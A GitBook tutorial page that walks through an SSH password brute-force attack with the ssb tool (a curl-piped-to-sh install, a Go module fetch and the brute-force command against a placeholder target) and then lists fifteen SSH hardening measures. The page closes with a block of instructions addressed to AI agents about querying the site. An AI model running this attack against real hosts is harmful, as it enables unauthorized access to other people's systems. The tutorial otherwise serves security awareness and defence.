# How to Perform SSH Brute Force Attack  and How Can We Protect Our Systems from It?

<figure><img src="https://2451201392-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSXlq8GYyAbVnvbRZogU3%2Fuploads%2Fz0VHquf8HmmkGS6bMWVl%2Fimage.png?alt=media&#x26;token=781dd16c-b7fc-40ac-bf43-a2c35c714753" alt="" width="563"><figcaption><p><em>Image Source:</em> <a href="https://www.hostinger.co.id/tutorial/cara-menggunakan-command-ssh"><em>https://www.hostinger.co.id/tutorial/cara-menggunakan-command-ssh</em></a></p></figcaption></figure>

{% hint style="warning" %}
Use what I'm about to say in this article only for the right purposes, such as raising security awareness and improving the security posture of your environments. I do not accept any responsibility for other uses.
{% endhint %}

The subject of our article is how to perform brute force attacks on systems via SSH service. For this reason, knowing some basic information will be useful to perform this test.

### What is SSH?

SSH (Secure Shell) is a cryptographic network protocol and software suite used to provide secure access, file transfer, and command-line interfaces for various network services. SSH plays a crucial role in information security and is commonly used for remote access to and management of computers and servers.

### What is Brute Force Attack?

A brute force attack is a term used in cybersecurity. Such attacks are used to gain access to encrypted or password-protected systems. A brute force attack attempts to access the targeted system by trying every possible encryption key or password. It essentially works by systematically trying every possible combination.

So, Lets do it!

### Requirements

&#x20;     -> Attacker Machine(Preferably Kali)\
&#x20;     -> Victim Machine\
&#x20;     -> SSH Brute Force Tool\
&#x20;     -> Go Programming Language

Let's fetch the necessary ssh brute force tool with curl.

```bash
curl -sSfL 'https://git.io/kitabisa-ssb' | sh -s -- -b /usr/local/bin
```

<figure><img src="https://2451201392-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSXlq8GYyAbVnvbRZogU3%2Fuploads%2Fc2KK49T4ZzOVYZxXysGR%2Fimage.png?alt=media&#x26;token=2de93ae2-89fe-4c41-951b-ee32616b20f5" alt=""><figcaption></figcaption></figure>

Install the Go Programming Language

```bash
apt install golang-go
```

<figure><img src="https://2451201392-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSXlq8GYyAbVnvbRZogU3%2Fuploads%2Fg06Gt72OH8iRBabZAfaY%2Fimage.png?alt=media&#x26;token=a00026b8-3532-4d74-a417-7c84e8ab1134" alt=""><figcaption></figcaption></figure>

Let's enable Go Modules and run the relevant command to download the "ktbs.dev/ssb" module and add it to the project.

```bash
GO111MODULE=on go get ktbs.dev/ssb
```

<figure><img src="https://2451201392-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSXlq8GYyAbVnvbRZogU3%2Fuploads%2F2h1SkxCVvwAfIDgBfW4I%2Fimage.png?alt=media&#x26;token=3ed3f8e5-e34d-4d2d-a264-5452a4e43565" alt=""><figcaption></figcaption></figure>

Create the password list.

<figure><img src="https://2451201392-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSXlq8GYyAbVnvbRZogU3%2Fuploads%2F53VWItmUmbhAmTXkcsVL%2Fimage.png?alt=media&#x26;token=a9c09a9e-ca28-4577-8460-96067e09b86b" alt=""><figcaption></figcaption></figure>

Then, lest's run the  brute force command.

```bash
ssb -p 22 -w passwords.txt <AccountName>@<TargetIP>
```

<figure><img src="https://2451201392-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSXlq8GYyAbVnvbRZogU3%2Fuploads%2FGQgfVVWI8rknWzUrgs0O%2Fimage.png?alt=media&#x26;token=4182ad9c-f827-46bb-b958-8288cd117ccd" alt=""><figcaption></figcaption></figure>

As can be seen in a very short time, the attack was completed and the correct password was found.

### How can we protect our SSH services from Brute Force Attacks?

1. **Use Strong Passwords or Passphrases**:
   * Ensure that users have strong, complex passwords or passphrase-based authentication. Encourage them to use a combination of upper and lower-case letters, numbers, and special characters.
2. **SSH Key Authentication**:
   * Implement SSH key-based authentication. This method is more secure than password authentication as it's not vulnerable to brute force attacks.
3. **Change Default SSH Port**:
   * Change the default SSH port (Port 22) to a non-standard port. This makes it harder for automated tools to find your SSH service.
4. **Implement Fail2Ban or SSHGuard**:
   * Install and configure intrusion detection systems like Fail2Ban or SSHGuard. These tools automatically block IP addresses after a certain number of failed login attempts, effectively countering brute force attacks.
5. **SSH Configuration**:
   * In your SSH server configuration file (usually located at `/etc/ssh/sshd_config`), set the following parameters:
     * **MaxAuthTries**: Limit the number of authentication attempts.
     * **LoginGraceTime**: Shorten the allowed time for login attempts.
     * **AllowUsers** or **AllowGroups**: Specify which users or groups are allowed to SSH into the system.
6. **Use Two-Factor Authentication (2FA)**:
   * Implement 2FA for SSH. This adds an extra layer of security, even if an attacker obtains the password.
7. **IP Whitelisting**:
   * Allow SSH access only from trusted IP addresses or IP ranges. This can be done using firewall rules.
8. **Regularly Update SSH Software**:
   * Keep your SSH server software up to date to patch known vulnerabilities.
9. **Monitor and Log**:
   * Monitor your SSH logs for suspicious activities and set up alerts for multiple failed login attempts.
10. **Limit User Access**:
    * Only provide SSH access to users who need it. Avoid giving SSH access to all users by default.
11. **Use Bastion Hosts**:
    * Implement a bastion host or jump server, which acts as an intermediary for SSH connections, further isolating your critical systems.
12. **Disable Root Login**:
    * Disable direct root login via SSH. Instead, require users to log in with their own accounts and use sudo or su to gain superuser privileges.
13. **Regularly Audit User Accounts**:
    * Periodically audit and remove unnecessary or inactive user accounts.
14. **Educate Users**:
    * Educate users about the importance of security practices and social engineering threats.
15. **Consider Web Application Firewalls (WAF)**:
    * If you have a public-facing SSH service, consider using a WAF to filter and protect against malicious traffic.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alirodoplu.gitbook.io/ali-rodoplu/offensive/how-to-perform-ssh-brute-force-attack-and-how-can-we-protect-our-systems-from-it.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.